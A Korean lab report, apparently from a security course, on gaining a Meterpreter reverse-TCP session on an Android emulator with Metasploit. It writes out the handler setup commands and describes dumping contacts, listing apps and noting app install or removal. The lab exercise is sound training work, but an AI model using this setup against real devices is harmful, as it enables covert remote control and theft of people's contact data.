안드로이드 모의 해킹 및 포렌식 분석 보고서

Metasploit Meterpreter 세션 구축 및 단말기 아티팩트 분석 결과 리포트

0. 실습 시나리오

실습 개요 본 실습은 칼리 리눅스(Kali Linux) 환경에서 Metasploit Framework의 'exploit/multi/handler'와 'android/meterpreter/reverse_tcp' 페이로드를 활용하여 안드로이드 가상 머신(Nox Emulator) 대상 reverse connection 세션을 확보하는 과정을 다룹니다.
확보된 Meterpreter 세션을 통해 시스템 정보를 수집하고, 연락처 및 설치된 앱 목록(appapi 확장 활용)을 추출하며, 단말기 내 제어 명령을 실습합니다.

0-1. 사용 도구 및 환경

구분 도구 및 환경 명칭 주요 역할
Kali Kali Linux (Metasploit Framework) 핸들러 대기 및 페이로드 제어 ('msfconsole')
Nox Nox Player (Android Emulator) 타겟 안드로이드 단말기 환경
Payload (악성 코드) android/meterpreter/reverse_tcp 역방향 TCP 연결을 통한 원격 제어 세션 확보

1. 조사 개요 (Evidence Info)

분석 대상 안드로이드 가상 단말기 (Nox Player) 파일 시스템
추출 데이터 단말기 연락처('contacts_dump_*.txt'), 설치된 애플리케이션 목록
세션 포트 LPORT: 4444 (Reverse TCP)

2. 분석 환경 및 핸들러 설정 구문

  • Metasploit Handler 설정 명령:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [칼리_IP]
set LPORT 4444
run

3. 상세 분석 내용 및 과정

  • 연락처 정보 추출 ('dump_contacts'): 기기 내 주소록 데이터를 추출하여 칼리 리눅스 실행 디렉터리에 텍스트 파일 형식으로 저장 완료.
연락처 추출 증거 화면

[그림 1] 주소록 추출 및 로컬 저장 경로 확인

  • 애플리케이션 목록 분석 ('appapi' 및 'app_list'): 앱 제어 및 조회를 위해 'load appapi' 명령어로 확장 기능을 로드한 뒤, 설치된 앱 목록을 패키지 이름('com.*') 기준으로 조회함.
앱 목록 분석 증거 화면

[그림 2] 'appapi' 로드 후 앱 리스트 패키지명 분석 화면

4. 결론

  • 본 실습을 통해 안드로이드 환경에서의 reverse connection 세션 구축 방법과 Meterpreter 기반의 핵심 정보 추출'dump_contacts', 'app_list' 기법을 확인하였습니다.
  • Payload를 사용하여 상대방(Android)의 연락처(dump_contacts), 설치된 앱(app_list) 등을 확인할 수 있었고 더 나아가 앱을 설치 혹은 삭제까지 가능한 것을 확인하였습니다.